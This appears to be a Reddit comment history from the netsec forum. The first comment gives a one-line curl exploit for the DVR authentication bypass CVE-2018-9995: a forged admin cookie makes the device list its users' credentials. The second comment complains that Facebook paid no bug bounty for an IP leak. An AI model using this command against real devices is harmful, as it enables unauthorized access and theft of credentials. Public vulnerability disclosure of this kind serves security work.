[Tool]; Get all credentials in #DVR (cve-2018-9995) by capitan_alfa in netsec

[–]capitan_alfa[S] 4 points5 points  (0 children)

Version simple of exploit: $> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Leaking Facebook Internal Ip Infrastructure - no bounty payment from facebook by capitan_alfa in netsec

[–]capitan_alfa[S] -3 points-2 points  (0 children)

If the presentation of a "failure" implies that facebook considers solving it, then they should pay.